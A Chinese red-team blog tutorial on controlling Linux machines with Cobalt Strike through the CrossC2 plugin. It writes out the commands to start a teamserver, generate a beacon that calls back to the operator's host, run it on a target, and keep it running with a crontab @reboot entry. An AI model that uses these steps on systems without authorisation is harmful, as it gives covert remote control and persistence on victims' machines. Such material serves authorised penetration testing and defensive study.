运维 · 2023年10月9日 0

CobaltStrike上线Linux

在红蓝对抗中,我们常需要对目标进行长时间的控制,cobaltstrike原生对于上线windows比较轻松友好,但如果是Linux平台就需要用到第三方插件了。


准备工

这里使用CrossC2的插件,类似于在linux上反弹一个cobaltstrike类的shell。

github:https://github.com/gloxec/CrossC2

下载时注意自己的cs版本(我这里使用的是3.0.2的最新版插件,cs版本为4.3)

需要下载以下两个文件:

CrossC2***.cnagenCrossC2.Linux

由于我的木马是在linux平台生成的,因此使用genCrossC2.Linux,可根据自己平台的差异自行选择


服务端部署

cobaltstrike服务端部署

chmod +x teamserver
./teamserver [ip] [password]


客户端连接

建立一个监听器,需要注意的是crossc2插件只支持httpsbeacon

安装crossc2


生成木马

我这里是在服务端的cobaltstrike目录直接生成的,如果在非服务端生成需要将服务端根目录的隐藏文件.cobaltstrike.beacon_keys复制下来放到cs根目录

chmod +x genCrossC2.Linux
./genCrossC2.Linux [ip] [port] ./.cobaltstrike.beacon_keys null Linux x64 /tmp/test


上线

在目标靶机上直接运行就可以看到上线了.

chmod +x test
./test


权限维持

一个简单的思想就是将其添加的系统启动项

有很多种方法,这里讲个最简单的,通过计划任务的方式实现

crontab -e
@reboot /tmp/test

这样每次重启之后都能重新执行

这里需要注意的是要设置以下次登录的用户的crontab

版权声明

本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文链接:https://blog.csdn.net/qq_35664104/article/details/121267679


免责声明

郑重声明:本号所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则后果自行承担!

如有侵权,请联系删除

好文推荐

红队打点评估工具推荐
干货|红队项目日常渗透笔记
实战|后台getshell+提权一把梭
一款漏洞查找器(挖漏洞的有力工具)
神兵利器 | 附下载 · 红队信息搜集扫描打点利器
神兵利器 | 分享 直接上手就用的内存马(附下载)
推荐一款自动向hackerone发送漏洞报告的扫描器

关注我,学习网络安全不迷路